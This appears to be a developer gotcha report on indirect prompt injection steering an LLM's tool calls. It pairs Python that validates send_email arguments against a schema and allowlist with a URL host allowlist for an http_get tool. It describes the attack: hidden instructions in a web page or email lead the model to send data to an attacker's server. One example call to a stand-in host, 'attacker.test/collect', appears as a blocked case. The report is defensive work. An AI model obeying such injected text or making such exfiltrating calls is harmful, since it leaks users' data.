Report #40588
[gotcha] LLM executing malicious actions via tool calling arguments
Validate and sanitize all arguments generated by the LLM before passing them to tool implementations. Never trust LLM-generated URLs, IDs, or commands blindly; enforce strict schemas and allowlists in the tool execution layer.
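A minimal sketch of what a strict schema plus allowlist could look like for a send_email tool. The argument names (to, subject, body), the example.com allowlist, and the ToolArgumentError and validate_send_email_args names are all hypothetical; they are not taken from any particular framework.

```python
import re

# Hypothetical allowlist: the only domains this tool may send mail to.
ALLOWED_RECIPIENT_DOMAINS = {"example.com"}

# Deliberately narrow address pattern; group 1 captures the domain.
_EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@([A-Za-z0-9.-]+)")


class ToolArgumentError(ValueError):
    """Raised when LLM-generated tool arguments fail validation."""


def validate_send_email_args(args):
    """Return a copy of args if they pass every check, else raise."""
    if not isinstance(args, dict):
        raise ToolArgumentError("arguments must be an object")

    # Strict schema: exactly these keys, no extras, no omissions.
    expected = {"to", "subject", "body"}
    if set(args) != expected:
        raise ToolArgumentError(f"expected exactly the keys {sorted(expected)}")
    for key in expected:
        if not isinstance(args[key], str):
            raise ToolArgumentError(f"{key} must be a string")

    # Allowlist: the recipient domain must be one we explicitly trust.
    match = _EMAIL_RE.fullmatch(args["to"])
    if match is None or match.group(1).lower() not in ALLOWED_RECIPIENT_DOMAINS:
        raise ToolArgumentError("recipient is not on the allowlist")

    # Reject line breaks in the subject to avoid header injection.
    if len(args["subject"]) > 200 or "\n" in args["subject"] or "\r" in args["subject"]:
        raise ToolArgumentError("subject is too long or contains a line break")

    return dict(args)
```

The tool execution layer would call validate_send_email_args on the parsed arguments before invoking the real mail-sending code, and treat a ToolArgumentError as a refused tool call rather than retrying with the same input.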
Journey Context:
Developers often assume the LLM will only call tools with safe arguments because a schema was provided. However, indirect prompt injection (instructions hidden in content the model reads, such as a web page or an email) can cause the LLM to call a send_email or http_get tool with attacker-controlled arguments (e.g., exfiltrating data to an attacker's server). The LLM is just a text generator; it doesn't 'know' the URL is malicious. Validation must happen outside the LLM, in the code that executes the tool.
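To illustrate validation outside the LLM for the http_get case, here is a rough sketch that checks a model-supplied URL against a host allowlist before any request is made. The api.example.com host, the is_allowed_url and guarded_http_get names, and the injected fetch callable are assumptions made for this example only.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist: the only hosts the http_get tool may contact.
ALLOWED_HOSTS = {"api.example.com"}


def is_allowed_url(url):
    """Return True only for plain https URLs whose host is allowlisted."""
    if not isinstance(url, str):
        return False
    try:
        parts = urlsplit(url)
        port = parts.port  # accessing .port raises ValueError if malformed
    except ValueError:
        return False
    if parts.scheme != "https":
        return False
    # Reject embedded credentials such as https://api.example.com@attacker.test/
    if parts.username is not None or parts.password is not None:
        return False
    if port not in (None, 443):
        return False
    return parts.hostname in ALLOWED_HOSTS


def guarded_http_get(url, fetch):
    """Call fetch(url) only if the URL passes the allowlist check.

    fetch stands in for whatever HTTP client the tool really uses.
    """
    if not is_allowed_url(url):
        raise PermissionError("blocked tool call: URL is not on the allowlist")
    return fetch(url)
```

With this in place, an injected call such as http_get("https://attacker.test/collect?d=secret") is refused in the execution layer regardless of what the model was tricked into generating. The check covers only the initial URL; if the underlying HTTP client follows redirects, each redirect target would need the same check.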
⚠ Workarounds are unverified - always check before running. Confirmations show what worked for others, not a safety guarantee.
Lifecycle
2026-06-18T22:36:02.236669+00:00— report_created — created